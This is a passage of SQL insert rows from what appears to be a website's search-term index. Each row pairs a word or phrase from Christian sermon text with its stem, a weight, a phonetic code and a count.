(100954, 'responsibilities', 'respons', 0, 0, 1, 'R21521432', 3, '*'),
(100955, 'rest', 'rest', 0, 0, 0.2667, 'R230', 5, '*'),
(100956, 'rest of', 'rest of', 0, 1, 1.2333, 'R231', 2, '*'),
(100957, 'rest of the', 'rest of the', 0, 1, 1.3667, 'R2313', 2, '*'),
(100961, 'right now', 'right now', 0, 1, 1.3, 'R235', 2, '*'),
(100966, 'romans 12', 'roman 12', 0, 1, 1.3, 'R520', 3, '*'),
(100967, 'romans 12 1-2', 'roman 12 1-2', 0, 1, 1.4333, 'R520', 3, '*'),
(100969, 'room to', 'room to', 0, 1, 1.2333, 'R530', 2, '*'),
(100971, 'sadly', 'sadli', 0, 0, 0.3333, 'S340', 2, '*'),
(100983, 'serve', 'serv', 0, 0, 0.3333, 'S610', 4, '*'),
(100984, 'serve god', 'serv god', 0, 1, 1.3, 'S6123', 3, '*'),
(101003, 'should have', 'should have', 0, 1, 1.3667, 'S431', 2, '*'),
(101010, 'sick', 'sick', 0, 0, 0.2667, 'S000', 4, '*'),
(101021, 'soldier', 'soldier', 0, 0, 0.4667, 'S436', 2, '*'),
(101027, 'solve', 'solv', 0, 0, 0.3333, 'S410', 2, '*'),
(101032, 'spirit room', 'spirit room', 0, 1, 1.3667, 'S16365', 2, '*'),
(101033, 'spirit room to', 'spirit room to', 0, 1, 1.4667, 'S163653', 2, '*'),
(101056, 'such as', 'such as', 0, 1, 1.2333, 'S000', 4, '*'),
(101058, 'such that when', 'such that when', 0, 1, 1.4667, 'S350', 2, '*'),
(101059, 'sunday', 'sundai', 0, 0, 0.4, 'S530', 5, '*'),
(101074, 'than they', 'than they', 0, 1, 1.3, 'T530', 2, '*'),
(101076, 'that a', 'that a', 0, 1, 1.2, 'T000', 4, '*'),
(101086, 'that plague', 'that plague', 0, 1, 1.3667, 'T142', 2, '*'),
(101087, 'that plague today\'s', 'that plague today', 0, 1, 1.6333, 'T14232', 2, '*'),
(101091, 'that thou', 'that thou', 0, 1, 1.3, 'T000', 2, '*'),
(101094, 'that when you', 'that when you', 0, 1, 1.4333, 'T500', 3, '*'),
(101098, 'the basic', 'the basic', 0, 1, 1.3, 'T120', 2, '*'),
(101128, 'the majority', 'the majority', 0, 1, 1.4, 'T5263', 2, '*'),
(101132, 'the nations', 'the nations', 0, 1, 1.3667, 'T5352', 2, '*'),
(101141, 'the point', 'the point', 0, 1, 1.3, 'T153', 2, '*'),
(101143, 'the problems', 'the problems', 0, 1, 1.4, 'T161452', 3, '*'),
(101144, 'the problems that', 'the problems that', 0, 1, 1.5667, 'T1614523', 2, '*'),
(101145, 'the real', 'the real', 0, 1, 1.2667, 'T640', 2, '*'),
(101149, 'the rest', 'the rest', 0, 1, 1.2667, 'T623', 2, '*'),
(101150, 'the rest of', 'the rest of', 0, 1, 1.3667, 'T6231', 2, '*'),
(101153, 'the sick', 'the sick', 0, 1, 1.2667, 'T200', 2, '*'),
(101158, 'the wiles', 'the wiles', 0, 1, 1.3, 'T420', 2, '*'),
(101159, 'the wiles of', 'the wiles of', 0, 1, 1.4, 'T421', 2, '*'),
(101162, 'their faith', 'their faith', 0, 1, 1.3667, 'T613', 2, '*'),
(101173, 'them to', 'them to', 0, 1, 1.2333, 'T530', 6, '*'),
(101179, 'there no longer', 'there no longer', 0, 1, 1.5, 'T654526', 2, '*'),
(101191, 'they can', 'thei can', 0, 1, 1.2667, 'T250', 3, '*'),
(101193, 'they don\'t', 'thei don', 0, 1, 1.3333, 'T530', 2, '*'),
(101207, 'this is your', 'thi is your', 0, 1, 1.4, 'T260', 2, '*'),
(101210, 'this point', 'thi point', 0, 1, 1.3333, 'T2153', 2, '*'),
(101214, 'this that', 'thi that', 0, 1, 1.3, 'T230', 3, '*'),
(101234, 'thy works', 'thy works', 0, 1, 1.3, 'T620', 2, '*'),
(101245, 'to all', 'to all', 0, 1, 1.2, 'T400', 6, '*'),
(101247, 'to be able', 'to be able', 0, 1, 1.3333, 'T140', 3, '*'),
(101268, 'to his', 'to his', 0, 1, 1.2, 'T200', 10, '*'),
(101274, 'to pass', 'to pass', 0, 1, 1.2333, 'T120', 5, '*'),
(101276, 'to people', 'to people', 0, 1, 1.3, 'T140', 2, '*'),
(101282, 'to solve', 'to solve', 0, 1, 1.2667, 'T241', 2, '*'),
(101291, 'to us in', 'to us in', 0, 1, 1.2667, 'T250', 2, '*'),
(101297, 'today\'s', 'todai', 0, 0, 0.4667, 'T200', 2, '*'),
(101315, 'tool', 'tool', 0, 0, 0.2667, 'T400', 2, '*'),
(101334, 'up to the', 'up to the', 0, 1, 1.3, 'U130', 2, '*'),
(101338, 'us that', 'us that', 0, 1, 1.2333, 'U230', 5, '*'),
(101343, 'verse 18', 'vers 18', 0, 1, 1.2667, 'V620', 2, '*'),
(101347, 'very powerful', 'veri powerful', 0, 1, 1.4333, 'V61614', 2, '*'),
(101349, 'walk in', 'walk in', 0, 1, 1.2333, 'W425', 4, '*'),
(101354, 'war', 'war', 0, 0, 0.2, 'W600', 2, '*'),
(101371, 'we shall', 'we shall', 0, 1, 1.2667, 'W240', 2, '*'),
(101375, 'we should', 'we should', 0, 1, 1.3, 'W243', 2, '*'),
(101382, 'well you', 'well you', 0, 1, 1.2667, 'W400', 2, '*'),
(101387, 'what happens', 'what happens', 0, 1, 1.4, 'W3152', 4, '*'),
(101396, 'where they', 'where they', 0, 1, 1.3333, 'W630', 2, '*'),
(101399, 'who are', 'who are', 0, 1, 1.2333, 'W600', 4, '*'),
(101401, 'who can', 'who can', 0, 1, 1.2333, 'W250', 3, '*'),
(101405, 'why you', 'why you', 0, 1, 1.2333, 'W000', 3, '*'),
(101410, 'wiles', 'wile', 0, 0, 0.3333, 'W420', 2, '*'),
(101411, 'wiles of', 'wile of', 0, 1, 1.2667, 'W421', 2, '*'),
(101412, 'wiles of the', 'wile of the', 0, 1, 1.4, 'W4213', 2, '*'),
(101434, 'world of', 'world of', 0, 1, 1.2667, 'W6431', 5, '*'),
(101435, 'world of pollution', 'world of pollution', 0, 1, 1.6, 'W6431435', 3, '*'),
(101443, 'would', 'would', 0, 0, 0.3333, 'W430', 15, '*'),
(101450, 'you at', 'you at', 0, 1, 1.2, 'Y300', 4, '*'),
(101454, 'you find yourself', 'you find yourself', 0, 1, 1.5667, 'Y1536241', 4, '*'),
(101457, 'you move', 'you move', 0, 1, 1.2667, 'Y510', 4, '*'),
(101459, 'you must become', 'you must become', 0, 1, 1.5, 'Y523125', 3, '*'),
(101461, 'you must not', 'you must not', 0, 1, 1.4, 'Y52353', 3, '*'),
(101464, 'you should have', 'you should have', 0, 1, 1.5, 'Y2431', 2, '*'),
(101473, 'your confidence', 'your confidence', 0, 1, 1.5, 'Y6251352', 3, '*'),
(101474, 'your confidence in', 'your confidence in', 0, 1, 1.6, 'Y62513525', 3, '*'),
(101483, 'your pastor', 'your pastor', 0, 1, 1.3667, 'Y61236', 2, '*'),
(101815, '34th', '34th', 0, 0, 0.2667, 'T000', 2, '*'),
(101816, '34th year', '34th year', 0, 1, 1.3, 'T600', 2, '*'),
(101817, '34th year of', '34th year of', 0, 1, 1.4, 'T610', 2, '*'),
(101851, 'anything outside', 'anyth outside', 0, 1, 1.5333, 'A5352323', 2, '*'),
(101876, 'becomes', 'becom', 0, 0, 0.4667, 'B252', 8, '*'),
(101884, 'beloved of', 'belov of', 0, 1, 1.3333, 'B4131', 7, '*'),
(101885, 'beloved of god', 'belov of god', 0, 1, 1.4667, 'B413123', 7, '*'),
(101886, 'bible for', 'bibl for', 0, 1, 1.3, 'B416', 2, '*'),
(101892, 'build', 'build', 0, 0, 0.3333, 'B430', 3, '*'),
(101893, 'build up', 'build up', 0, 1, 1.2667, 'B431', 2, '*'),
(101894, 'build up your', 'build up your', 0, 1, 1.4333, 'B4316', 2, '*'),
(101914, 'concerning your', 'concern your', 0, 1, 1.5, 'C526526', 2, '*'),
(101916, 'consistent', 'consist', 0, 0, 0.6667, 'C52353', 3, '*'),
(101922, 'dearly beloved of', 'dearli beloved of', 0, 1, 1.5667, 'D6414131', 6, '*'),
(101925, 'devil is', 'devil is', 0, 1, 1.2667, 'D142', 7, '*'),
(101927, 'discipline', 'disciplin', 0, 0, 0.6667, 'D2145', 4, '*'),
(101930, 'discipline your', 'disciplin your', 0, 1, 1.5, 'D21456', 3, '*'),
(101945, 'else', 'els', 0, 0, 0.2667, 'E420', 3, '*'),
(101954, 'fellow', 'fellow', 0, 0, 0.4, 'F400', 3, '*'),
(101957, 'fellowship', 'fellowship', 0, 0, 0.6667, 'F421', 4, '*'),
(101958, 'fellowship with', 'fellowship with', 0, 1, 1.5, 'F4213', 4, '*'),
(101963, 'for i', 'for i', 0, 1, 1.1667, 'F600', 2, '*'),
(101966, 'from our', 'from our', 0, 1, 1.2667, 'F656', 29, '*'),
(101967, 'from our father', 'from our father', 0, 1, 1.5, 'F656136', 27, '*'),
(101968, 'from our father\'s', 'from our father', 0, 1, 1.5667, 'F6561362', 29, '*'),
(101974, 'god has said', 'god has said', 0, 1, 1.4, 'G323', 4, '*'),
(101975, 'god is not', 'god is not', 0, 1, 1.3333, 'G3253', 5, '*'),
(101976, 'god is saying', 'god is saying', 0, 1, 1.4333, 'G3252', 2, '*'),
(101977, 'god wants', 'god wants', 0, 1, 1.3, 'G3532', 8, '*'),
(101978, 'god wants you', 'god wants you', 0, 1, 1.4333, 'G3532', 4, '*'),
(101980, 'god will only', 'god will only', 0, 1, 1.4333, 'G3454', 2, '*'),
(101981, 'god\'s call', 'god call', 0, 1, 1.3333, 'G324', 5, '*'),
(101983, 'hanging', 'hang', 0, 0, 0.4667, 'H5252', 3, '*'),
(101988, 'happen in', 'happen in', 0, 1, 1.3, 'H150', 2, '*'),
(101990, 'has said', 'ha said', 0, 1, 1.2667, 'H230', 5, '*'),
(101996, 'hast', 'hast', 0, 0, 0.2667, 'H230', 2, '*'),
(102003, 'health', 'health', 0, 0, 0.4, 'H430', 3, '*'),
(102006, 'heart 22', 'heart 22', 0, 1, 1.2667, 'H630', 2, '*'),
(102008, 'heart 5', 'heart 5', 0, 1, 1.2333, 'H630', 2, '*'),
(102020, 'his words', 'hi words', 0, 1, 1.3, 'H2632', 2, '*'),
(102023, 'holy spirit and', 'holi spirit and', 0, 1, 1.5, 'H4216353', 4, '*'),
(102025, 'i will', 'i will', 0, 1, 1.2, 'I400', 5, '*'),
(102029, 'in dream', 'in dream', 0, 1, 1.2667, 'I5365', 2, '*'),
(102030, 'in dream centre', 'in dream centre', 0, 1, 1.5, 'I53652536', 2, '*'),
(102032, 'in your heart', 'in your heart', 0, 1, 1.4333, 'I563', 2, '*'),
(102037, 'is in your', 'is in your', 0, 1, 1.3333, 'I256', 2, '*'),
(102040, 'is my', 'is my', 0, 1, 1.1667, 'I250', 6, '*'),
(102041, 'is my 34th', 'is my 34th', 0, 1, 1.3333, 'I253', 2, '*'),
(102047, 'is saying', 'is saying', 0, 1, 1.3, 'I252', 2, '*'),
(102057, 'it in', 'it in', 0, 1, 1.1667, 'I350', 7, '*'),
(102070, 'jeremiah', 'jeremiah', 0, 0, 0.5333, 'J650', 3, '*'),
(102081, 'late', 'late', 0, 0, 0.2667, 'L300', 4, '*'),
(102107, 'meditate', 'medit', 0, 0, 0.5333, 'M300', 3, '*'),
(102108, 'meditate on', 'medit on', 0, 1, 1.3667, 'M350', 2, '*'),
(102129, 'my 34th', 'my 34th', 0, 1, 1.2333, 'M300', 2, '*'),
(102130, 'my 34th year', 'my 34th year', 0, 1, 1.4, 'M360', 2, '*'),
(102148, 'obeying', 'obei', 0, 0, 0.4667, 'O152', 5, '*'),
(102149, 'obeying god\'s', 'obei god', 0, 1, 1.4333, 'O15232', 2, '*'),
(102150, 'obeying god\'s call', 'obei god call', 0, 1, 1.6, 'O152324', 2, '*'),
(102153, 'of negative', 'of negative', 0, 1, 1.3667, 'O15231', 4, '*'),
(102155, 'of obeying', 'of obeying', 0, 1, 1.3333, 'O152', 4, '*'),
(102156, 'of obeying god\'s', 'of obeying god', 0, 1, 1.5333, 'O15232', 2, '*'),
(102157, 'of you are', 'of you are', 0, 1, 1.3333, 'O160', 2, '*'),
(102158, 'on it', 'on it', 0, 1, 1.1667, 'O530', 2, '*'),
(102160, 'once you', 'onc you', 0, 1, 1.2667, 'O520', 4, '*'),
(102161, 'once you are', 'onc you are', 0, 1, 1.4, 'O526', 2, '*'),
(102165, 'our father', 'our father', 0, 1, 1.3333, 'O6136', 27, '*'),
(102166, 'our father s', 'our father s', 0, 1, 1.4, 'O61362', 27, '*'),
(102167, 'our father\'s', 'our father', 0, 1, 1.4, 'O61362', 29, '*'),
(102168, 'our father\'s heart', 'our father heart', 0, 1, 1.6, 'O6136263', 29, '*'),
(102169, 'out in', 'out in', 0, 1, 1.2, 'O350', 4, '*'),
(102172, 'outside', 'outsid', 0, 0, 0.4667, 'O323', 2, '*'),
(102180, 'people that will', 'peopl that will', 0, 1, 1.5333, 'P434', 2, '*'),
(102184, 'points', 'point', 0, 0, 0.4, 'P532', 7, '*'),
(102187, 'pressure', 'pressur', 0, 0, 0.5333, 'P626', 3, '*'),
(102190, 'program', 'program', 0, 0, 0.4667, 'P6265', 2, '*'),
(102193, 'progress', 'progress', 0, 0, 0.5333, 'P6262', 2, '*'),
(102196, 'prophecies', 'propheci', 0, 0, 0.6667, 'P612', 5, '*'),
(102197, 'prophecies that', 'propheci that', 0, 1, 1.5, 'P6123', 3, '*'),
(102198, 'prophecies that is', 'propheci that is', 0, 1, 1.6, 'P61232', 3, '*'),
(102199, 'protect your', 'protect your', 0, 1, 1.4, 'P63236', 2, '*'),
(102205, 'right in', 'right in', 0, 1, 1.2667, 'R235', 2, '*'),
(102219, 'said i', 'said i', 0, 1, 1.2, 'S300', 5, '*'),
(102221, 'said the', 'said the', 0, 1, 1.2667, 'S300', 2, '*'),
(102222, 'said the lord', 'said the lord', 0, 1, 1.4333, 'S3463', 2, '*'),
(102234, 'seen', 'seen', 0, 0, 0.2667, 'S500', 7, '*'),
(102245, 'some of you', 'some of you', 0, 1, 1.3667, 'S510', 3, '*'),
(102253, 'spirit and', 'spirit and', 0, 1, 1.3333, 'S16353', 7, '*'),
(102255, 'stage', 'stage', 0, 0, 0.3333, 'S320', 2, '*'),
(102267, 'that make', 'that make', 0, 1, 1.3, 'T520', 3, '*'),
(102272, 'the devil is', 'the devil is', 0, 1, 1.4, 'T142', 7, '*'),
(102278, 'the truths', 'the truths', 0, 1, 1.3333, 'T632', 2, '*'),
(102283, 'them in your', 'them in your', 0, 1, 1.4, 'T560', 2, '*'),
(102286, 'then said', 'then said', 0, 1, 1.3, 'T523', 3, '*'),
(102295, 'things work', 'thing work', 0, 1, 1.3667, 'T5262', 2, '*'),
(102299, 'this is my', 'thi is my', 0, 1, 1.3333, 'T250', 3, '*'),
(102301, 'thou hast', 'thou hast', 0, 1, 1.3, 'T230', 2, '*'),
(102307, 'to declare', 'to declare', 0, 1, 1.3333, 'T246', 2, '*'),
(102310, 'to get', 'to get', 0, 1, 1.2, 'T230', 7, '*'),
(102324, 'too late', 'too late', 0, 1, 1.2667, 'T430', 3, '*'),
(102326, 'truths', 'truth', 0, 0, 0.4, 'T632', 4, '*'),
(102335, 'until you', 'until you', 0, 1, 1.3, 'U534', 7, '*'),
(102338, 'unto me', 'unto me', 0, 1, 1.2333, 'U535', 4, '*'),
(102347, 'watch', 'watch', 0, 0, 0.3333, 'W320', 4, '*'),
(102354, 'well in', 'well in', 0, 1, 1.2333, 'W450', 2, '*'),
(102359, 'what god is', 'what god is', 0, 1, 1.3667, 'W3232', 3, '*'),
(102360, 'what god will', 'what god will', 0, 1, 1.4333, 'W3234', 2, '*'),
(102363, 'when it is', 'when it is', 0, 1, 1.3333, 'W532', 2, '*'),
(102369, 'will be able', 'will be able', 0, 1, 1.4, 'W414', 4, '*'),
(102377, 'with the holy', 'with the holy', 0, 1, 1.4333, 'W340', 4, '*'),
(102383, 'word to', 'word to', 0, 1, 1.2333, 'W630', 2, '*'),
(102392, 'work at', 'work at', 0, 1, 1.2333, 'W623', 2, '*'),
(102397, 'year of', 'year of', 0, 1, 1.2333, 'Y610', 2, '*'),
(102398, 'year of obeying', 'year of obeying', 0, 1, 1.5, 'Y6152', 2, '*'),
(102403, 'you let', 'you let', 0, 1, 1.2333, 'Y430', 3, '*'),
(102406, 'you see', 'you see', 0, 1, 1.2333, 'Y200', 3, '*'),
(102413, 'your health', 'your health', 0, 1, 1.3667, 'Y643', 2, '*'),
(102418, 'your mouth', 'your mouth', 0, 1, 1.3333, 'Y653', 7, '*'),
(108048, 'beloved you', 'belov you', 0, 1, 1.3667, 'B413', 4, '*'),
(108049, 'beloved you must', 'belov you must', 0, 1, 1.5333, 'B413523', 2, '*'),
(108078, 'complete', 'complet', 0, 0, 0.5333, 'C5143', 4, '*'),
(108092, 'dearly beloved you', 'dearli beloved you', 0, 1, 1.6, 'D641413', 2, '*'),
(108150, 'foundation', 'foundat', 0, 0, 0.6667, 'F535', 3, '*'),
(108223, 'into your life', 'into your life', 0, 1, 1.4667, 'I53641', 5, '*'),
(108406, 'of your mouth', 'of your mouth', 0, 1, 1.4333, 'O1653', 3, '*'),
(108414, 'or the', 'or the', 0, 1, 1.2, 'O630', 5, '*'),
(108491, 'saw', 'saw', 0, 0, 0.2, 'S000', 4, '*'),
(108572, 'they never', 'thei never', 0, 1, 1.3333, 'T516', 2, '*'),
(108589, 'time to', 'time to', 0, 1, 1.2333, 'T530', 5, '*'),
(108651, 'with them and', 'with them and', 0, 1, 1.4333, 'W353', 2, '*'),
(108652, 'with you and', 'with you and', 0, 1, 1.4, 'W353', 2, '*'),
(108655, 'words let', 'word let', 0, 1, 1.3, 'W63243', 2, '*'),
(109983, '02', '02', 0, 0, 0.2, '', 8, '*'),
(109984, '02 2017', '02 2017', 0, 1, 1.2333, '', 4, '*'),
(109985, '05', '05', 0, 0, 0.2, '', 7, '*'),
(109990, '21', '21', 0, 0, 0.2, '', 10, '*'),
(110003, 'a shield', 'a shield', 0, 1, 1.2667, 'A243', 2, '*'),
(110028, 'and god\'s', 'and god', 0, 1, 1.3, 'A53232', 2, '*'),
(110030, 'and i', 'and i', 0, 1, 1.1667, 'A530', 9, '*'),
(110043, 'are so', 'ar so', 0, 1, 1.2, 'A620', 2, '*'),
(110053, 'assignment don\'t', 'assign don', 0, 1, 1.5333, 'A25353', 2, '*'),
(110055, 'assignment that', 'assign that', 0, 1, 1.5, 'A253', 2, '*'),
(110059, 'away your', 'awai your', 0, 1, 1.3, 'A600', 3, '*'),
(110065, 'be born', 'be born', 0, 1, 1.2333, 'B650', 3, '*'),
(110073, 'bear', 'bear', 0, 0, 0.2667, 'B600', 3, '*'),
(110079, 'below', 'below', 0, 0, 0.3333, 'B400', 3, '*'),
(110080, 'below are', 'below are', 0, 1, 1.3, 'B460', 3, '*'),
(110091, 'broken', 'broken', 0, 0, 0.4, 'B625', 2, '*'),
(110095, 'but his', 'but his', 0, 1, 1.2333, 'B320', 3, '*'),
(110097, 'but if', 'but if', 0, 1, 1.2, 'B310', 4, '*'),
(110098, 'but if you', 'but if you', 0, 1, 1.3333, 'B310', 2, '*'),
(110112, 'case', 'case', 0, 0, 0.2667, 'C000', 2, '*'),
(110113, 'case in', 'case in', 0, 1, 1.2333, 'C500', 2, '*'),
(110122, 'connected', 'connect', 0, 0, 0.6, 'C523', 2, '*'),
(110123, 'connected to', 'connect to', 0, 1, 1.4, 'C523', 2, '*'),
(110140, 'deliver', 'deliv', 0, 0, 0.4667, 'D416', 3, '*'),
(110145, 'destiny and', 'destini and', 0, 1, 1.3667, 'D2353', 8, '*'),
(110147, 'developing', 'develop', 0, 0, 0.6667, 'D14152', 2, '*'),
(110150, 'devil wants', 'devil wants', 0, 1, 1.3667, 'D14532', 2, '*'),
(110152, 'discussion', 'discuss', 0, 0, 0.6667, 'D250', 2, '*'),
(110159, 'do with', 'do with', 0, 1, 1.2333, 'D000', 4, '*'),
(110160, 'do with the', 'do with the', 0, 1, 1.3667, 'D000', 2, '*'),
(110163, 'don\'t do', 'don do', 0, 1, 1.2667, 'D530', 4, '*'),
(110172, 'draw the', 'draw the', 0, 1, 1.2667, 'D630', 2, '*'),
(110181, 'everything', 'everyth', 0, 0, 0.6667, 'E16352', 8, '*'),
(110184, 'explain', 'explain', 0, 0, 0.4667, 'E2145', 2, '*'),
(110189, 'father\'s heart 05', 'father heart 05', 0, 1, 1.5667, 'F36263', 2, '*'),
(110194, 'for long', 'for long', 0, 1, 1.2667, 'F6452', 2, '*'),
(110198, 'for your destiny', 'for your destiny', 0, 1, 1.5333, 'F63235', 4, '*'),
(110202, 'from you', 'from you', 0, 1, 1.2667, 'F650', 2, '*'),
(110204, 'get out', 'get out', 0, 1, 1.2333, 'G300', 2, '*'),
(110212, 'god away', 'god away', 0, 1, 1.2667, 'G300', 2, '*'),
(110221, 'god with them', 'god with them', 0, 1, 1.4333, 'G350', 2, '*'),
(110222, 'god\'s presence', 'god presence', 0, 1, 1.4667, 'G3216252', 2, '*'),
(110233, 'hand', 'hand', 0, 0, 0.2667, 'H530', 9, '*'),
(110236, 'handle', 'handl', 0, 0, 0.4, 'H534', 3, '*'),
(110254, 'heart 05', 'heart 05', 0, 1, 1.2667, 'H630', 2, '*'),
(110260, 'high', 'high', 0, 0, 0.2667, 'H200', 3, '*'),
(110290, 'in things', 'in things', 0, 1, 1.3, 'I5352', 3, '*'),
(110301, 'is our', 'is our', 0, 1, 1.2, 'I260', 3, '*'),
(110312, 'it was not', 'it was not', 0, 1, 1.3333, 'I3253', 3, '*'),
(110316, 'journey of', 'journei of', 0, 1, 1.3333, 'J651', 2, '*'),
(110319, 'keep the', 'keep the', 0, 1, 1.2667, 'K130', 2, '*'),
(110321, 'kept', 'kept', 0, 0, 0.2667, 'K130', 6, '*'),
(110324, 'key to', 'kei to', 0, 1, 1.2, 'K300', 3, '*'),
(110337, 'life is', 'life is', 0, 1, 1.2333, 'L120', 6, '*'),
(110344, 'like that', 'like that', 0, 1, 1.3, 'L230', 2, '*'),
(110361, 'man in', 'man in', 0, 1, 1.2, 'M000', 4, '*'),
(110363, 'many people', 'mani people', 0, 1, 1.3667, 'M140', 4, '*'),
(110370, 'may not', 'mai not', 0, 1, 1.2333, 'M300', 7, '*'),
(110372, 'me from', 'me from', 0, 1, 1.2333, 'M165', 2, '*'),
(110373, 'me from the', 'me from the', 0, 1, 1.3667, 'M1653', 2, '*'),
(110374, 'measure', 'measur', 0, 0, 0.4667, 'M260', 3, '*'),
(110377, 'money and', 'monei and', 0, 1, 1.3, 'M300', 2, '*'),
(110379, 'morning', 'morn', 0, 0, 0.4667, 'M652', 4, '*'),
(110384, 'mouth be', 'mouth be', 0, 1, 1.2667, 'M310', 2, '*'),
(110386, 'must know', 'must know', 0, 1, 1.3, 'M2325', 4, '*'),
(110395, 'not how', 'not how', 0, 1, 1.2333, 'N300', 2, '*'),
(110397, 'not know', 'not know', 0, 1, 1.2667, 'N325', 3, '*'),
(110403, 'of david', 'of david', 0, 1, 1.2667, 'O1313', 2, '*'),
(110405, 'of god away', 'of god away', 0, 1, 1.3667, 'O123', 2, '*'),
(110406, 'of god he', 'of god he', 0, 1, 1.3, 'O123', 2, '*'),
(110409, 'of god with', 'of god with', 0, 1, 1.3667, 'O123', 2, '*'),
(110413, 'of the most', 'of the most', 0, 1, 1.3667, 'O13523', 2, '*'),
(110414, 'of them', 'of them', 0, 1, 1.2333, 'O135', 8, '*'),
(110421, 'or you', 'or you', 0, 1, 1.2, 'O600', 2, '*'),
(110435, 'poor', 'poor', 0, 0, 0.2667, 'P600', 2, '*'),
(110454, 'relationships', 'relationship', 0, 0, 0.8667, 'R435212', 6, '*'),
(110461, 'respect', 'respect', 0, 0, 0.4667, 'R2123', 6, '*'),
(110464, 's heart 05', 's heart 05', 0, 1, 1.3333, 'S630', 2, '*'),
(110467, 'secret', 'secret', 0, 0, 0.4, 'S630', 3, '*'),
(110472, 'serious', 'seriou', 0, 0, 0.4667, 'S620', 11, '*'),
(110473, 'serious don\'t', 'seriou don', 0, 1, 1.4333, 'S62353', 2, '*'),
(110480, 'shield', 'shield', 0, 0, 0.4, 'S430', 2, '*'),
(110487, 'so many', 'so many', 0, 1, 1.2333, 'S500', 2, '*'),
(110491, 'spirit over', 'spirit over', 0, 1, 1.3667, 'S16316', 2, '*'),
(110498, 'strength', 'strength', 0, 0, 0.5333, 'S36523', 8, '*'),
(110503, 'struggle', 'struggl', 0, 0, 0.5333, 'S3624', 4, '*'),
(110504, 'struggle in', 'struggl in', 0, 1, 1.3667, 'S36245', 2, '*'),
(110506, 'success in', 'success in', 0, 1, 1.3333, 'S500', 2, '*'),
(110508, 'suffer', 'suffer', 0, 0, 0.4, 'S160', 4, '*'),
(110511, 'sustain', 'sustain', 0, 0, 0.4667, 'S350', 2, '*'),
(110516, 'take heed', 'take heed', 0, 1, 1.3, 'T230', 5, '*'),
(110517, 'take heed to', 'take heed to', 0, 1, 1.4, 'T230', 5, '*'),
(110531, 'that has', 'that has', 0, 1, 1.2667, 'T200', 5, '*'),
(110538, 'that was', 'that was', 0, 1, 1.2667, 'T200', 7, '*'),
(110539, 'that was the', 'that was the', 0, 1, 1.4, 'T230', 2, '*'),
(110543, 'that\'s why', 'that why', 0, 1, 1.3333, 'T200', 5, '*'),
(110547, 'the assignment', 'the assignment', 0, 1, 1.4667, 'T253', 3, '*'),
(110554, 'the devil wants', 'the devil wants', 0, 1, 1.5, 'T14532', 2, '*'),
(110555, 'the fire', 'the fire', 0, 1, 1.2667, 'T160', 2, '*'),
(110559, 'the journey', 'the journey', 0, 1, 1.3667, 'T265', 2, '*'),
(110560, 'the journey of', 'the journey of', 0, 1, 1.4667, 'T2651', 2, '*'),
(110563, 'the morning', 'the morning', 0, 1, 1.3667, 'T5652', 3, '*'),
(110578, 'themselves', 'themselv', 0, 0, 0.6667, 'T52412', 3, '*'),
(110582, 'there you', 'there you', 0, 1, 1.3, 'T600', 2, '*'),
(110604, 'to do with', 'to do with', 0, 1, 1.3333, 'T000', 3, '*'),
(110612, 'to sustain', 'to sustain', 0, 1, 1.3333, 'T235', 2, '*'),
(110626, 'walking', 'walk', 0, 0, 0.4667, 'W4252', 3, '*'),
(110631, 'was not', 'wa not', 0, 1, 1.2333, 'W253', 5, '*'),
(110645, 'whether you', 'whether you', 0, 1, 1.3667, 'W360', 5, '*'),
(110646, 'whether you are', 'whether you are', 0, 1, 1.5, 'W360', 3, '*'),
(110650, 'will be a', 'will be a', 0, 1, 1.3, 'W410', 6, '*'),
(110655, 'will sustain', 'will sustain', 0, 1, 1.4, 'W4235', 2, '*'),
(110659, 'with you in', 'with you in', 0, 1, 1.3667, 'W350', 5, '*'),
(110667, 'wrong relationships', 'wrong relationships', 0, 1, 1.6333, 'W6526435212', 3, '*'),
(110672, 'you for', 'you for', 0, 1, 1.2333, 'Y160', 5, '*'),
(110677, 'you if you', 'you if you', 0, 1, 1.3333, 'Y100', 3, '*'),
(110679, 'you into', 'you into', 0, 1, 1.2667, 'Y530', 3, '*'),
(110681, 'you keep', 'you keep', 0, 1, 1.2667, 'Y210', 3, '*'),
(110684, 'you may', 'you may', 0, 1, 1.2333, 'Y500', 6, '*'),
(110686, 'you must know', 'you must know', 0, 1, 1.4333, 'Y52325', 4, '*'),
(110694, 'your destiny', 'your destiny', 0, 1, 1.4, 'Y63235', 10, '*'),
(110695, 'your destiny and', 'your destiny and', 0, 1, 1.5333, 'Y632353', 4, '*'),
(110703, 'your mouth be', 'your mouth be', 0, 1, 1.4333, 'Y6531', 2, '*'),
(110704, 'your obedience', 'your obedience', 0, 1, 1.4667, 'Y61352', 6, '*'),
(113301, 'ask you', 'ask you', 0, 1, 1.2333, 'A200', 5, '*'),
(113321, 'bad', 'bad', 0, 0, 0.2, 'B300', 8, '*'),
(113494, 'degree', 'degre', 0, 0, 0.4, 'D260', 2, '*'),
(113643, 'faith is', 'faith is', 0, 1, 1.2667, 'F320', 3, '*'),
(113646, 'faith is the', 'faith is the', 0, 1, 1.4, 'F323', 2, '*'),
(113822, 'in faith', 'in faith', 0, 1, 1.2667, 'I513', 3, '*'),
(114056, 'most of', 'most of', 0, 1, 1.2333, 'M231', 5, '*'),
(114229, 'practice', 'practic', 0, 0, 0.5333, 'P6232', 5, '*'),
(114378, 'simple', 'simpl', 0, 0, 0.4, 'S514', 3, '*'),
(114507, 'the key', 'the key', 0, 1, 1.2333, 'T200', 2, '*'),
(114769, 'what to', 'what to', 0, 1, 1.2333, 'W300', 6, '*'),
(114770, 'what to do', 'what to do', 0, 1, 1.3333, 'W300', 5, '*'),
(114776, 'where you', 'where you', 0, 1, 1.3, 'W600', 9, '*'),
(114861, 'you get', 'you get', 0, 1, 1.2333, 'Y230', 7, '*'),
(114932, '20', '20', 0, 0, 0.2, '', 8, '*'),
(114946, '29', '29', 0, 0, 0.2, '', 5, '*'),
(114949, '52', '52', 0, 0, 0.2, '', 3, '*'),
(114955, 'a house', 'a house', 0, 1, 1.2333, 'A200', 3, '*'),
(114956, 'a house of', 'a house of', 0, 1, 1.3333, 'A210', 3, '*'),
(114982, 'among', 'among', 0, 0, 0.3333, 'A520', 5, '*'),
(114983, 'among the', 'among the', 0, 1, 1.3, 'A523', 1, '*'),
(114996, 'and forward', 'and forward', 0, 1, 1.3667, 'A53163', 2, '*'),
(114998, 'and let them', 'and let them', 0, 1, 1.4, 'A53435', 2, '*'),
(115031, 'be complete', 'be complete', 0, 1, 1.3667, 'B25143', 2, '*'),
(115048, 'building', 'build', 0, 0, 0.5333, 'B4352', 5, '*'),
(115051, 'but i', 'but i', 0, 1, 1.1667, 'B300', 4, '*'),
